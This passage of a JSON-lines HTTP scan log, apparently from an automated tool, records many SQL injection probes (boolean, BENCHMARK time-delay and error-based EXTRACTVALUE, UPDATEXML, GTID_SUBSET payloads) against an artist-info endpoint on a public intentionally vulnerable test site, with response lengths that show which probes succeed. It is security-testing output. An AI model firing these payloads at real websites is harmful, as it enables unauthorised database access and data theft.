T%20%28ELT%287698%3D7698%2C1%29%29%29%2C0x716b786b71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7176716271%2C%28SELECT%20%28ELT%287698%3D7698%2C1%29%29%29%2C0x716b786b71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29\",\"time\":\"356.727972ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:00.410749174Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20%28SELECT%207571%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7178706a71%2C%28SELECT%20%28ELT%287571%3D7571%2C1%29%29%29%2C0x71706b6a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29--%20hpUy\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20%28SELECT%207571%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7178706a71%2C%28SELECT%20%28ELT%287571%3D7571%2C1%29%29%29%2C0x71706b6a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29--%20hpUy\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20%28SELECT%207571%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7178706a71%2C%28SELECT%20%28ELT%287571%3D7571%2C1%29%29%29%2C0x71706b6a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29--%20hpUy\",\"time\":\"354.881041ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:00.423057784Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%201991%3D3459\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%201991%3D3459\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%201991%3D3459\",\"time\":\"344.318475ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:00.43685313Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%202284%3D2697\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%202284%3D2697\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%202284%3D2697\",\"time\":\"345.488155ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:00.462209055Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%202595%3D4516%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%202595%3D4516%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%202595%3D4516%23\",\"time\":\"354.921378ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:01.007342421Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%201456%3DBENCHMARK%285000000%2CMD5%280x4e786349%29%29--%20ncfq\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%201456%3DBENCHMARK%285000000%2CMD5%280x4e786349%29%29--%20ncfq\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%201456%3DBENCHMARK%285000000%2CMD5%280x4e786349%29%29--%20ncfq\",\"time\":\"937.580959ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:01.059248079Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%202145%3DBENCHMARK%285000000%2CMD5%280x624e656c%29%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%202145%3DBENCHMARK%285000000%2CMD5%280x624e656c%29%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%202145%3DBENCHMARK%285000000%2CMD5%280x624e656c%29%29%23\",\"time\":\"971.076579ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:04.31428832Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%204229%3D3436\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%204229%3D3436\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%204229%3D3436\",\"time\":\"339.586542ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:04.321770847Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%204910%3D4211%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%204910%3D4211%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%204910%3D4211%23\",\"time\":\"342.800048ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:04.902508114Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%202669%3DBENCHMARK%285000000%2CMD5%280x4a62416c%29%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%202669%3DBENCHMARK%285000000%2CMD5%280x4a62416c%29%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%202669%3DBENCHMARK%285000000%2CMD5%280x4a62416c%29%29\",\"time\":\"941.049257ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:05.323143775Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%205413%3D5413%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%205413%3D5413%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%205413%3D5413%23\",\"time\":\"352.383456ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:05.341771061Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%205629%3D1437--%20YNOo\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%205629%3D1437--%20YNOo\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%205629%3D1437--%20YNOo\",\"time\":\"353.452654ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:05.49205473Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%205772%3D5772--%20VKbq\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%205772%3D5772--%20VKbq\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%205772%3D5772--%20VKbq\",\"time\":\"349.882709ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:05.564942802Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%206311%3D6311\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%206311%3D6311\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%206311%3D6311\",\"time\":\"340.831244ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:05.7470124Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%208596%3D7802--%20PbPi\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%208596%3D7802--%20PbPi\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%208596%3D7802--%20PbPi\",\"time\":\"342.885579ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:05.807463219Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%208829%3D8829--%20PFhx\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%208829%3D8829--%20PFhx\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%208829%3D8829--%20PFhx\",\"time\":\"360.979529ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:05.89416859Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%209129%3D9129\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%209129%3D9129\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%209129%3D9129\",\"time\":\"351.620577ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:05.926789136Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20EXP%28~%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%286543%3D6543%2C1%29%29%29%2C0x716b7a6271%2C0x78%29%29x%29%29--%20OFtx\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20EXP%28~%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%286543%3D6543%2C1%29%29%29%2C0x716b7a6271%2C0x78%29%29x%29%29--%20OFtx\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20EXP%28~%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%286543%3D6543%2C1%29%29%29%2C0x716b7a6271%2C0x78%29%29x%29%29--%20OFtx\",\"time\":\"361.498176ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:05.954274658Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20EXTRACTVALUE%287168%2CCONCAT%280x5c%2C0x7178706a71%2C%28SELECT%20%28ELT%287168%3D7168%2C1%29%29%29%2C0x71706b6a71%29%29--%20rHqP\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20EXTRACTVALUE%287168%2CCONCAT%280x5c%2C0x7178706a71%2C%28SELECT%20%28ELT%287168%3D7168%2C1%29%29%29%2C0x71706b6a71%29%29--%20rHqP\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20EXTRACTVALUE%287168%2CCONCAT%280x5c%2C0x7178706a71%2C%28SELECT%20%28ELT%287168%3D7168%2C1%29%29%29%2C0x71706b6a71%29%29--%20rHqP\",\"time\":\"353.163149ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:06.213965918Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20GTID_SUBSET%28CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%281769%3D1769%2C1%29%29%29%2C0x716b7a6271%29%2C1769%29--%20GMlJ\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20GTID_SUBSET%28CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%281769%3D1769%2C1%29%29%29%2C0x716b7a6271%29%2C1769%29--%20GMlJ\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20GTID_SUBSET%28CONCAT%280x7162787a71%2C%28SELECT%20%28ELT%281769%3D1769%2C1%29%29%29%2C0x716b7a6271%29%2C1769%29--%20GMlJ\",\"time\":\"343.748861ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:06.273805417Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%208386%3DBENCHMARK%285000000%2CMD5%280x5a674156%29%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%208386%3DBENCHMARK%285000000%2CMD5%280x5a674156%29%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%208386%3DBENCHMARK%285000000%2CMD5%280x5a674156%29%29%23\",\"time\":\"930.513432ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":23,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:06.288897188Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20GTID_SUBSET%28CONCAT%280x7176716271%2C%28SELECT%20%28ELT%285076%3D5076%2C1%29%29%29%2C0x716b786b71%29%2C5076%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20GTID_SUBSET%28CONCAT%280x7176716271%2C%28SELECT%20%28ELT%285076%3D5076%2C1%29%29%29%2C0x716b786b71%29%2C5076%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20GTID_SUBSET%28CONCAT%280x7176716271%2C%28SELECT%20%28ELT%285076%3D5076%2C1%29%29%29%2C0x716b786b71%29%2C5076%29\",\"time\":\"344.099149ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:06.336310587Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20GTID_SUBSET%28CONCAT%280x7178706a71%2C%28SELECT%20%28ELT%286160%3D6160%2C1%29%29%29%2C0x71706b6a71%29%2C6160%29--%20LTYw\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20GTID_SUBSET%28CONCAT%280x7178706a71%2C%28SELECT%20%28ELT%286160%3D6160%2C1%29%29%29%2C0x71706b6a71%29%2C6160%29--%20LTYw\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20GTID_SUBSET%28CONCAT%280x7178706a71%2C%28SELECT%20%28ELT%286160%3D6160%2C1%29%29%29%2C0x71706b6a71%29%2C6160%29--%20LTYw\",\"time\":\"345.318774ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:06.507185705Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7178706a71%2C%28SELECT%20%28ELT%289312%3D9312%2C1%29%29%29%2C0x71706b6a71%29%29%20USING%20utf8%29%29%29--%20WagD\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7178706a71%2C%28SELECT%20%28ELT%289312%3D9312%2C1%29%29%29%2C0x71706b6a71%29%29%20USING%20utf8%29%29%29--%20WagD\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x7178706a71%2C%28SELECT%20%28ELT%289312%3D9312%2C1%29%29%29%2C0x71706b6a71%29%29%20USING%20utf8%29%29%29--%20WagD\",\"time\":\"354.230924ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:09.905046993Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20ROW%281538%2C4332%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7162787a71%2C%28SELECT%20%28ELT%281538%3D1538%2C1%29%29%29%2C0x716b7a6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%208784%20UNION%20SELECT%206642%20UNION%20SELECT%205717%20UNION%20SELECT%206776%29a%20GROUP%20BY%20x%29--%20CcGi\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20ROW%281538%2C4332%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7162787a71%2C%28SELECT%20%28ELT%281538%3D1538%2C1%29%29%29%2C0x716b7a6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%208784%20UNION%20SELECT%206642%20UNION%20SELECT%205717%20UNION%20SELECT%206776%29a%20GROUP%20BY%20x%29--%20CcGi\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20ROW%281538%2C4332%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7162787a71%2C%28SELECT%20%28ELT%281538%3D1538%2C1%29%29%29%2C0x716b7a6271%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%208784%20UNION%20SELECT%206642%20UNION%20SELECT%205717%20UNION%20SELECT%206776%29a%20GROUP%20BY%20x%29--%20CcGi\",\"time\":\"353.690632ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:09.990000088Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20ROW%284790%2C6847%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176716271%2C%28SELECT%20%28ELT%284790%3D4790%2C1%29%29%29%2C0x716b786b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%204316%20UNION%20SELECT%206774%20UNION%20SELECT%207024%20UNION%20SELECT%205627%29a%20GROUP%20BY%20x%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20ROW%284790%2C6847%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176716271%2C%28SELECT%20%28ELT%284790%3D4790%2C1%29%29%29%2C0x716b786b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%204316%20UNION%20SELECT%206774%20UNION%20SELECT%207024%20UNION%20SELECT%205627%29a%20GROUP%20BY%20x%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20ROW%284790%2C6847%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x7176716271%2C%28SELECT%20%28ELT%284790%3D4790%2C1%29%29%29%2C0x716b786b71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%204316%20UNION%20SELECT%206774%20UNION%20SELECT%207024%20UNION%20SELECT%205627%29a%20GROUP%20BY%20x%29\",\"time\":\"358.102411ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:10.727197822Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20UPDATEXML%283477%2CCONCAT%280x2e%2C0x7176716271%2C%28SELECT%20%28ELT%283477%3D3477%2C1%29%29%29%2C0x716b786b71%29%2C6541%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20AND%20UPDATEXML%283477%2CCONCAT%280x2e%2C0x7176716271%2C%28SELECT%20%28ELT%283477%3D3477%2C1%29%29%29%2C0x716b786b71%29%2C6541%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20AND%20UPDATEXML%283477%2CCONCAT%280x2e%2C0x7176716271%2C%28SELECT%20%28ELT%283477%3D3477%2C1%29%29%29%2C0x716b786b71%29%2C6541%29\",\"time\":\"345.62117ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowle